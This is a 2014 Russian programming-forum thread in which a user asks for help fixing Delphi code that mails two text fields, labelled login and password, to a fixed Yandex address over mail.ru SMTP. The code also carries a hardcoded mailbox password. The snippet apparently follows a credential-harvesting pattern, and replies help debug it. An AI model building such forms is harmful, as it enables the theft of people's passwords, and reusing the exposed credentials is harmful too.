0 / 0 / 0
Регистрация: 11.10.2014
Сообщений: 63
1

Программа с отправкой на почту

11.10.2014, 15:12. Показов 810. Ответов 9
Метки нет (Все метки)

Author24 — интернет-сервис помощи студентам
Прошу помочь.Мне нужен код,для того чтобы сделать отправку на почту.Допустим у меня есть 2 едита и 1 баттон.IdAntiFreeze1,IdMessage1,IdSMTP1.Вот с этими компонентами мне нужна программа.В интернете искал,в ютюбе тоже,но нахожу совсем другое.Пожалуйста помогите,буду благодарен.

Добавлено через 7 минут
Вот такой есть код,он работает,но при нажатии на кнопку он выдает ошибку.
Delphi
1
2
3
4
5
6
7
8
9
10
11
12
13
idMessage1.Charset:='windows-1251'; //Не трогаем
idmessage1.contenttype:='text/html'; //Не трогаем
idSmtp1.Host:='smtp.mail.ru'; //Не трогаем
idSmtp1.Port:=587;  //Не трогаем
idsmtp1.Username:='test-pw'; //Логин от ящика(Отправителя)
idSmtp1.Password:='384618d'; //Пароль от ящика(Отправителя)
IdMessage1.Body.text:='Логин/'+Edit1.text+'Пароль/'+Edit2.Text; //Какие переменные мы хотим получить
idMessage1.From.Text:='test-pw';//Логин(Отправителя)
idMessage1.Recipients.EmailAddresses:='artemachq@yandex.ru';//Логинполучателя (Пишем вместе с@mail.ru)
idMessage1.Subject:='Subject'; //Не трогаем
idSmtp1.Connect(); //Коннект
idSmtp1.Send(idmessage1); //Отправка сообщения
idSmtp1.Disconnect(); //Отключение?
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
11.10.2014, 15:12
Ответы с готовыми решениями:

Программа для отправки письма на почту
Сколько уже пишу на этом форуме,ни кто не может мне помочь с проектом.Раз так,я готов купить...

Непонятки с отправкой файлов на почту
Вообщем нужно мне отправить файлы на почту, но они коем чудом не доходят "Сбой при отправке...

Форма заказа с отправкой на почту
Есть форма заказа с отправкой на почту, к ней нужно добавить стоимость каждого тарифа, в...

Нюанс с отправкой HTML на почту. Дизайн
Всем привет :) Возник такой нюанс у меня. Вообщем имеется такой код формы: <style...

9
Эксперт С++
8385 / 6147 / 615
Регистрация: 10.12.2010
Сообщений: 28,683
Записей в блоге: 30
11.10.2014, 15:37 2
Цитата Сообщение от Mister_Q Посмотреть сообщение
на кнопку он выдает ошибку.
Ошибку мы должны у тебя с мозгов прочитать телепатически?
0
0 / 0 / 0
Регистрация: 11.10.2014
Сообщений: 63
11.10.2014, 15:52  [ТС] 3
Программа с отправкой на почту

https://www.cyberforum.ru/atta... 1413028306
0
0 / 0 / 0
Регистрация: 11.10.2014
Сообщений: 63
11.10.2014, 17:10  [ТС] 4
Есть ту кто?????
0
Эксперт С++
8385 / 6147 / 615
Регистрация: 10.12.2010
Сообщений: 28,683
Записей в блоге: 30
11.10.2014, 18:21 5
Цитата Сообщение от Mister_Q Посмотреть сообщение
idsmtp1.Username:='test-pw'
Тут адрес ящика должен быть.
0
0 / 0 / 0
Регистрация: 11.10.2014
Сообщений: 63
11.10.2014, 19:53  [ТС] 6
Блин в чем проблема,скажите мне кардинально что изменить?Мне эта программа пазоресс нужна,если можно помогите с кодом,а если кто может скиньте исходник.Очень поможете.
Delphi
1
2
3
4
5
6
7
8
9
10
11
12
13
idMessage1.Charset:='windows-1251'; //Не трогаем
idmessage1.contenttype:='text/html'; //Не трогаем
idSmtp1.Host:='smtp.mail.ru'; //Не трогаем
idSmtp1.Port:=587;  //Не трогаем
idsmtp1.Username:='maks2.2000@mail.ru'; //Логин от ящика(Отправителя)
idSmtp1.Password:='384618d'; //Пароль от ящика(Отправителя)
IdMessage1.Body.text:='Логин/'+Edit1.text+'Пароль/'+Edit2.Text; //Какие переменные мы хотим получить
idMessage1.From.Text:='test-pw';//Логин(Отправителя)
idMessage1.Recipients.EmailAddresses:='artemachq@yandex.ru';//Логинполучателя (Пишем вместе с@mail.ru)
idMessage1.Subject:='Subject'; //Не трогаем
idSmtp1.Connect(); //Коннект
idSmtp1.Send(idmessage1); //Отправка сообщения
idSmtp1.Disconnect(); //Отключение?
0
2664 / 2270 / 279
Регистрация: 24.12.2010
Сообщений: 13,723
11.10.2014, 20:17 7
Цитата Сообщение от Mister_Q Посмотреть сообщение
idMessage1.From.Text:='test-pw';//Логин(Отправителя)
Какой еще нафих "логин отправителя" ?
Ты когда письмо получаешь, разве логин видишь в обратном адресе ?
Голова-то нужна чтобы думать, а не только чтобы в нее ложку совать)


Не по теме:

Цитата Сообщение от Mister_Q Посмотреть сообщение
пазоресс
Дебильное коверканье языка у тебя лучше получается чем думать)

0
0 / 0 / 0
Регистрация: 11.10.2014
Сообщений: 63
11.10.2014, 20:28  [ТС] 8
А исходник можно?))))
0
842 / 737 / 342
Регистрация: 22.09.2012
Сообщений: 5,034
12.10.2014, 11:46 9
Непонял, а как у него почта без компонента IdSSLIOHandlerSocket работает?
0
1 / 1 / 0
Регистрация: 16.09.2013
Сообщений: 24
12.10.2014, 17:43 10
mail.ru использует с 22 сентября только ssl соединения и порт 465 для отправки, копайте в эту сторону, завтра буду на работе попробую набросать что нить если будет время
0
12.10.2014, 17:43
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
12.10.2014, 17:43
Помогаю со студенческими работами здесь

Интернет-магазин с отправкой из корзины на почту
Здравствуйте, форумчане) Нужно срочно сделать некоторую импровизацию интернет магазина, лучше всего...

Создать форму с отправкой файла на почту
Доброго времени суток народ! не знал куда написать решил сюда, заранее извиняюсь перед админами...

Создал форму онлайн заказа с отправкой на почту
Доброе время суток создал форму онлайн заказа с отправкой на почту .... но почему то не приходят...

Форма заказа с загрузкой файла и отправкой на электронную почту
Подскажите как сделать в коде что-бы прикрепляли файл и отправлялся на почту? Все остальное у меня...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
10
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2024, CyberForum.ru